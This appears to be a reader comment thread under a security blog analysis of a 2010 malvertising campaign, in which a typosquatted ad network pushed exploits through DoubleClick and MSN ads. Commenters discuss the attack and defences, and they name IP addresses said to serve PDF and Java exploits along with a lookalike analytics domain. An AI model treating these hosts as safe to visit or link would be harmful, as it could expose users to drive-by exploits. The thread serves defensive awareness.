- http://img818.imageshack.us/img818/7941/armo2.jpg

- http://img529.imageshack.us/img529/5127/armo1.jpg

Anonymous said...

@Anonymous December 11, 2010 5:01 AM

No, the previous anonymous poster has a legit question. I believe he understands that AdShufffle (wrong spelling) was posing as a legit company.

But it's not clearly explained (really, not explained at all) *how* this spelling exploit got into the ad networks. After all, there's no javascript code on the client side (eg, scout.com ) that references the misspelled ad network.

Your post though makes it clear that there is a human review process at doubleclick/msn where a checkbox was clicked that should not have been clicked. This was the piece of information that's missing from Armorize's post.

Anonymous said...

Wayne,

Excellent analysis. Could you follow-up with commentary on the social engineering aspect of the attack? I and other commenters here are very curious.

Anonymous said...

Is there a typo in the [Associated IP] section? The IPs listed are the same except for the leading 1.

95.5.161.10 (serving PDF exploit)
195.5.161.10 (serving Java jar exploit)

Hoyt LLC said...

http://www.cloudscan.me/2010/12/ad-cdn-malware-microsoft-google-full.html

Ad CDN | Malware | Microsoft | Google | Full Disclosure

Hoyt LLC Research observes an Article now Published in PCWORLD and available in the Public Domain.

Hoyt LLC Research is under a Pending Coordinated Disclosure Agreement with Microsoft and Google with respect to these issues.

However, the issues are now Published and these issues are now moved to Full Disclosure.

Anonymous said...

So, I was slated to perform roughly $1,500 of legal research work for two clients on the evening of December 8th, while out of state for a court hearing the next morning. I suffered the attack on my laptop at the hotel and had to phone the two clients to tell them I could not do the time sensitive work for them. It not only damaged the expected income stream but the business relationship. Does any of the analysis performed by the experts result in identification of the culprits, making any sort of recovery possible? I suspect the answer is no, even though there likely is a money flow that could be followed. Answer to stephen@calri.com if you prefer.

Returnil said...

Hi Wayne,
Nice work on the analysis and detailed information. I am certain it will be useful for a great number of users and researchers. One request however would be to add Jotti (http://virusscan.jotti.org/) to your detection check rather than just VT.

@Anonymous said.. (Lawyer): There are two things you should look at adding to your line up: Boot-to-restore and/or image restore. In the first, you could have simply restarted your computer and whatever the malvertisement did would simply be gone, and in the second, you could have quickly restored to a clean image and been able to follow through with your assignment.

Detection is never going to reach 100%, but there are ways to ensure your system remains clean and productive in spite of this fact.

Henry Hertz Hobbit said...

VirusTotal seems to be permanently swamped so Jotti is all I use now. If you use ABP with either EasyList or FanBoy you would have been spared. If you had been using my PAC filter plus hosts file with the ad.doubleclick.net and rad.msn.com blocks activated you would also have been spared. The name of the real adshuffles are this.content.served.by.adshuffle.com, images.adshuffle.com, and media2.adshuffle.com. I find it interesting that they are also using the false goog1e-analytics.com (that is a one after the g, not an el) because it was at the same IP address one of these hosts were at. If anybody knows of a good place to have these scripts converted on the Internet I am all ears because I have been doing all of them manually. Just post here if you know it so we can all have it. Everything I have found and tried so far has failed.

Anonymous said...

These ads are served up via Javascript. Really, if you're not browsing the internet using Firefox with NoScript installed, you're running around with your pants down.

melesofa said...

What a great resource!
